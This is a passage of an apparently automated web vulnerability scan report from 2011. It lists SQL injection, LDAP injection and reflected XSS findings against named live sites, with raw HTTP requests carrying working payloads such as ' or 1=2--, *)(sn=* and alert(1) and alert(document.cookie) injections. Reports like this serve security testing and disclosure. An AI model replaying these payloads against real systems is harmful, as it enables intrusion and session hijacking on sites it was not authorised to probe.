Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

Request 2

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0


2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /outbound/article/games.bet365.com

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0

Request 2

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)!(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

3. Cross-site scripting (reflected)  previous  next
There are 469 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecffa'-alert(1)-'64e16de441d was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441d HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:06 GMT
Expires: Mon, 16 May 2011 12:53:06 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441dhttp://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/\">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce96a"-alert(1)-"177f32f4f53 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:02 GMT
Expires: Mon, 16 May 2011 12:53:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53http://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmode = "opaque";

var bg =
...[SNIP]...

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ec69"-alert(1)-"ecd7fe965c6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0b8'-alert(1)-'f42e8ff9e63 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87af'-alert(1)-'92dc5cf3e85 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28566"-alert(1)-"c54abcfeda6 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmo
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fcbe"-alert(1)-"fd139792dbe was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

